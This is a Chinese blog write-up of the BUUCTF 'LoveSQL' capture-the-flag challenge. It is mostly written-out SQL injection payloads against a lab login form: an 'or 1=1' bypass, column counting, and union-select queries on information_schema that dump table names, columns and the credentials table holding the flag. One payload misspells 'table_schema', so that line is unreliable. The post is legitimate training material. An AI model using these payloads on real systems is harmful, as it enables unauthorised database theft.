BUUCTF[极客大挑战 2019]LoveSQL

本文通过实例展示了如何在靶机上进行SQL注入,从单引号和双引号的测试识别注入类型,进而利用各种技术手段如万能公式和联合查询爆破数据库,最终获取了flag。
摘要由CSDN通过智能技术生成
1.题目分析

启动靶机,进入网页

根据题目提示,考察SQL注入,看一下是单引号注入还是双引号,输入

1' //用户名
1 //密码随意

单引号时有回显,双引号时提示WRONG,所以是单引号注入。可以看到页面的回显提示我们sql注入的语法错误,而且使用的是MariaDB数据库。

2.开始注入
1.一般方法

先试一下万能公式

1' or 1=1 # //用户名
1 //密码随意

得到一个password,登录admin用户也回显这个页面,没发现这个password有啥特别作用。

2.查表

先查一下表内有几个字段

1' order by 4 #

当输入4时回显Unkonwn column,说明该表有三个字段,查一下三个字段

1' union select 1,2,3#

第三个字段是password,我们在用户名输入,进行联合爆表

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_scheme=database()#

得到两个表名geekuser和l0ve1ysq1,根据题目名字,最先怀疑它,先爆第二个表的字段

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#

再爆一下内容

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

flag直接出来了,页面不方便查看,查看源代码即可

  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值